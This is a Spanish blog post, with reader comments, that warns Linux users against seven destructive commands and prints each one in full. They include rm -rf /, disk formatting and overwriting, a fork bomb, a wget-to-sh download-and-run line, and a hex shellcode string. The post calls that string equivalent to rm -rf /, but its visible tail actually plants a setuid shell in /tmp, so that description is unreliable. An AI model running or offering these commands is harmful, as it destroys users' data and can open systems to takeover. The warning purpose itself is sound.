Antes de la tercera parte de “Uso básico de la terminal” (Parte IParte II) puede que sea oportuno hacerles saber de ciertos comandos (al menos los más conocidos) que por ninguna razón deben de meter en línea de comandos ni aunque un tal Dart Vader del planeta Vulcano se aparezca mientras duermen en sus habitaciones amenazándolos de derretir sus cerebros si no lo hacen …bromas a parte: NUNCA metan los siguientes comandos en terminal a menos que lo hagan en una máquina virtual (si son tan curiosos) , lo siguiente me lo pillo de otro lugar, dejo la fuente al final:

1. rm -rf /

Este comando borra recursivamente todos los archivos almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.

2.

char esp[] attribute ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.

3. mkfs.ext3 /dev/sda

Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).

4. :(){:|:&};:

Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.

5. cualquier_comando > /dev/sda

Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.

6. wget http://alguna_url -O- | sh

Este comando descargara un archivo ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.

7. mv /home/tu_usuario/* /dev/null

Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).

Por: angelitolinux en: “7 Comandos mortales para Linux” – alcancelibre.org 

Aquí una definición gráfica si llegasen a ejecutar de forma “exitosa” sudo rm -rf * es sus terminales:

sudo rm -rf *

Ahora ya lo saben, hay que tener un poco de cuidado con que clase de comandos ejecutamos como administrador, muchas distros lanzan una advertencia acerca de la orden de suicidio que están dándole al equipo, pero por si acaso no esta mal conocerlos.

18 COMENTARIOS

  1. Me pregunto si el comamdo rm -rf / elimina tambien las particiones que estan montadas. Siempre me he hecho esa pregunta pero no he encontrado la respuesta.

    • Pues espero que no te topes con nadie que este dispuesto a hacerte una broma de este tipo, pero por si acaso, nunca esta de mas saberlo 😉

  2. Gracias por este tercer artículo sobre los comandos, es tan bueno que lo voy a copiar y compartir en mi página (con tus créditos y enlaces claro está).

    • Puedes compartir mis post en tu página, no hay problema 🙂 Cuida siempre de las condiciones de la licencia CC (que están al píe de página) y no habrá ningún problema. Y aclaro, la mayor parte de esta entrada la saqué de otra web, menciona al autor y origen de esa parte.

      PD: Esta no es la tercera parte de “Uso básico de la terminal”, de hecho, me envicié un poco con unos juegos y no he empezado jeje saludos.

DEJA UNA RESPUESTA

Por favor, introduzca su comentario!
Por favor, introduzca su nombre aquí